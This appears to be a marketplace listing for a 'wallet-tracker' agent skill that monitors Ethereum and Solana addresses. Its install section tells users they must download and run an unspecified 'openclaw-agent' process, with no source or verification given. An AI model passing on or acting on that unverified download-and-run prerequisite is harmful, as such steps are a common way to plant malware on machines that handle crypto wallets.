wallet-tracker
Track blockchain addresses in real-time - monitor whale movements, get alerts on transactions, analyze portfolio changes across Ethereum, Solana, and other chains.
Why use this skill?
Track blockchain addresses, monitor whale movements, and analyze portfolio changes on Ethereum and Solana with the OpenClaw wallet-tracker skill.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-pbckxWhat This Skill Does
The wallet-tracker skill provides a robust framework for real-time monitoring of blockchain activities. It enables users to observe transactions, track whale movements, and analyze portfolio fluctuations across major networks like Ethereum and Solana. By integrating with the openclaw-agent, this skill acts as a bridge between blockchain explorers and your local terminal, allowing for automated, script-driven surveillance of any public wallet address.
Installation
To begin using the wallet-tracker, ensure you have the OpenClaw environment initialized. Execute the following command in your terminal:
clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-pbckx
Prerequisites: You must download and run the openclaw-agent to handle the underlying network requests. Without this agent, the wallet monitoring functions will not trigger.
Use Cases
- Whale Alerting: Monitor high-value transactions to track institutional or whale movements in real-time.
- Portfolio Management: Automatically log token transfers and NFT movements to maintain an updated snapshot of your assets.
- DeFi Analysis: Keep track of interaction patterns with decentralized finance protocols.
- Transaction Auditing: Quickly list the last N transactions for any wallet to verify activity logs.
Example Prompts
- "Track the Ethereum wallet 0x71C... and notify me whenever a transaction exceeds 10 ETH."
- "Show me the last 10 SOL transactions for address [SOL_ADDRESS] and print their slot heights."
- "Monitor my wallet [ADDRESS] for any incoming ERC-20 token transfers and report the symbol and amount."
Tips & Limitations
- API Limits: When using external services like Etherscan, ensure your API keys are valid to avoid rate limiting or connection errors.
- Agent Dependency: Always keep the
openclaw-agentprocess active in the background; closing it will terminate the tracking loop. - Privacy: Only track public blockchain addresses. While on-chain data is transparent, ensure you are not monitoring sensitive internal data through unauthorized API endpoints.
- Scaling: For large-scale monitoring of thousands of addresses, consider implementing a local caching layer to reduce redundant network calls and optimize your polling interval.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-wallet-tracker-pbckx": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.